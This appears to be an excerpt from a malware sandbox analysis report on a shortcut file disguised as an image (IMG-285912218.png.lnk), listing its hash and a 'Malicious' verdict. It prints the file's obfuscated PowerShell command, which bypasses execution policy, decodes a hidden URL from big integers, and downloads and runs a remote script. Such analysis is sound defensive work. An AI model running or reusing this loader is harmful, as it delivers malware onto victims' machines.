Infection Chain
Characteristics
Artefacts
Name: LNK: Command Execution
Value:

powershell.exe -ep bypass -c "$v=[bigint]\"15672546134675896723056169814999628033923469\";$r=[bigint]\"6139403790910975759451908051327495543859753\";$x=$v - $r;while($x -ne 0){$e+=[char]([int]($x -band 0xFF));$x=$x -shr 8};iwr $e -OutFile $env:TEMP\ZNmmIvD5.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\ZNmmIvD5.ps1"

debd3f013eacb8241b6a94d1e0d8fb1a (2.56 KB)
No malware configuration was found at this point.
Malicious

debd3f013eacb8241b6a94d1e0d8fb1a > IMG-285912218.png.lnk
